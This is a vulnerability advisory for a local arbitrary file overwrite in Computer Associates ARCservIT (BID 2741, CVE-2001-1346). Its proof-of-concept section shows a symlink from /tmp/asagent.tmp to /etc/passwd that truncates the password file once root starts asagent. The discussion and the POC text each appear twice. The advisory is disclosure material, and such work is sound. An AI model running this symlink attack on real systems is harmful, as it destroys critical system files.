ARCservIT Client asagent.tmp Arbitrary File Overwrite Vulnerability
BID:2741
Info
ARCservIT Client asagent.tmp Arbitrary File Overwrite Vulnerability
| Bugtraq ID: | 2741 |
| Class: | Access Validation Error |
| CVE: |
CVE-2001-1346 |
| Remote: | No |
| Local: | Yes |
| Published: | May 18 2001 12:00AM |
| Updated: | Jul 11 2009 06:06AM |
| Credit: | This vulnerabilty was discovered by Jonas Eriksson <[email protected]> and posted to BugTraq on May 18th, 2001. |
| Vulnerable: |
Computer Associates ARCServeIT 6.63 Computer Associates ARCServeIT 6.61 |
| Not Vulnerable: | |
Discussion
ARCservIT Client asagent.tmp Arbitrary File Overwrite Vulnerability
ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to overwrite arbitrary files.
When it runs for the first time, 'asagent', opens (and truncates it if it exists) a file in /tmp called 'asagent.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file.
This may allow malicious local users to overwrite critical system files.
ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to overwrite arbitrary files.
When it runs for the first time, 'asagent', opens (and truncates it if it exists) a file in /tmp called 'asagent.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file.
This may allow malicious local users to overwrite critical system files.
Exploit / POC
ARCservIT Client asagent.tmp Arbitrary File Overwrite Vulnerability
This example was posted to BugTraq by Jonas Eriksson <[email protected]> by May 18th, 2001.
As user:
je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp
And root:
root@boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u
ARCserveIT Universal Agent started...
Then,
je@boxname~> ls -la /etc/passwd
-r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd
This example was posted to BugTraq by Jonas Eriksson <[email protected]> by May 18th, 2001.
As user:
je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp
And root:
root@boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u
ARCserveIT Universal Agent started...
Then,
je@boxname~> ls -la /etc/passwd
-r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd
References
ARCservIT Client asagent.tmp Arbitrary File Overwrite Vulnerability
References:
References: